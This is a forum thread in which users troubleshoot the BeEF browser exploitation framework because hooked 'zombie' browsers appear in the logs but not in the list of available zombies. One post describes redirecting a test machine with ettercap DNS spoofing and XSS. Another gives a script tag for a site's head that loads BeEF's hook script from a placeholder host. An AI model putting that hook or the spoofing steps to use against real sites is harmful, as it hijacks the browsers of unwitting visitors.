Results 1 to 10 of 10

Thread: BeEF Framework - No Zombies (Zombie browser connected)

  1. #1
    mcurran
    Guest

    Default BeEF Framework - No Zombies (Zombie browser connected)

    Hello:

    I have been having a strange issue with BeEF. I have successfully edited etter.dns and use ettercap to dns_spoof my test machine to my server address and the Zombie is detected on the right side of the BeEF Framework page (http://xxx.xxx.x.x/beef/ui), but for some reason it still says no Zombies on the left side of the page and under the zombies dropdown menu. I have tried redirecting the test machine to just the beef/hook directory and also every sample page within the hook directory. I have used both dns_spoofing, xss redirecting, and plain connecting manually in the test machine, and all produce the same results: the zombie is detected and it shows their browser information on the right, but the zombie is not avaible for testing exploits

    [SOLVED]

    This behavior mysteriously stop occuring when sending the target machines to my ip followed by the example.php page again (e.g. http://***.***.*.*/beef/example.php).

    Moderators feel free to remove this thread.
    Last edited by mcurran; 02-08-2010 at 07:21 AM. Reason: SOLVED

  2. #2
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    10

    Default Re: BeEF Framework - No Zombies (Zombie browser connected)

    I'm having the same problem, I've got scripts enabled for all of localhost/beef, and I'm consistently getting messages that a browser is connected in the logs, but it never shows up on the left as a zombie, not even localhost when I run the example.

    I have a feeling this is something really simple, anyone know what I might be doing wrong?

  3. #3
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    10

    Default

    double posted sorry :-D

    bump, still trying to figure this out. I've experienced this on my bt4 install and the livecd as well
    Last edited by Archangel-Amael; 03-29-2010 at 09:51 PM.

  4. #4
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    2

    Default Re: BeEF Framework - No Zombies (Zombie browser connected)

    Hello,

    I also have this problem.

    I extracted Beef on my webhosting and installed Beef via my webbrowser.

    The directory that I say the zombies should connect to is: "mysite.com/beef" so I'm not pointing to a specific file, is that what I'm doing wrong?

    Because when I try to connect to "mysite.com/beef/example.php" the zombie is only connected on the right side of the browser and the left side says: "no zombies available".

    Do I have to enable/link/edit certain scripts in my ftp or something?

    Does somebody have a idea of what I might be doing wrong?

    Hanna

  5. #5
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    10

    Default Re: BeEF Framework - No Zombies (Zombie browser connected)

    Nope still haven't figured it out, I've been meaning to try switching computers and see if it's a hardware specific issue but I got sick of playing with it and haven't come back to it yet.

  6. #6
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    2

    Default Re: BeEF Framework - No Zombies (Zombie browser connected)

    Anyone else who can help us out?

  7. #7
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    2

    Default Re: BeEF Framework - No Zombies (Zombie browser connected)

    Try inserting this into the <head> part of your site in the web root:-
    <script language='Javascript' src="http://yoursite/beef/hook/beefmagic.js.php"></script>

  8. #8
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    10

    Default Re: BeEF Framework - No Zombies (Zombie browser connected)

    I came back to play with BEEF after a while, and I think that we're simply misreading it. When a VULNERABLE browser goes to the example.html page it connects and runs any scripts you tell it to, and is available under Available Zombies. If a non-vulnerable browser opens example.html, all you see is the example text. A message comes up in the log that a zombie connected, but it didn't work completely.

  9. #9
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    10

    Default Re: BeEF Framework - No Zombies (Zombie browser connected)

    I came back to this problem after a while, and I think that it's simply not working on some browsers. When a VULNERABLE browser connects, you get a message in the log and it shows up under Available Zombies. Otherwise, you just get a message in the log

  10. #10
    Just burned his ISO
    Join Date
    Apr 2011
    Posts
    1

    Default Re: BeEF Framework - No Zombies (Zombie browser connected)

    Yeah...same crap over here...when i press the example a dialog box opens up saying something like this Your victim needs to have the following code and i dont appear on zombies list only in the sidebar although that for instances it appeared and i was able to send a dialog box to myself...But i guess the user above has right and we are just misreading it
    The crap i dont understand is that for instances it worked

    SOLUTION FOUND>
    You cant close the beef page otherwise it will disappear...if you mantain the example webpage open a zombie will appear on sidebar

    100% working *for me*
    Last edited by sickness; 04-20-2011 at 09:35 AM.

Similar Threads

  1. Browser collection for testing client sides
    By m-1-k-3 in forum Experts Forum
    Replies: 6
    Last Post: 02-19-2010, 07:32 PM
  2. ettercap browser
    By minicoop78 in forum Beginners Forum
    Replies: 5
    Last Post: 01-29-2010, 09:27 PM
  3. Durzosploit - exploits generator framework
    By McFranco in forum Tool Requests
    Replies: 1
    Last Post: 01-26-2010, 11:36 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •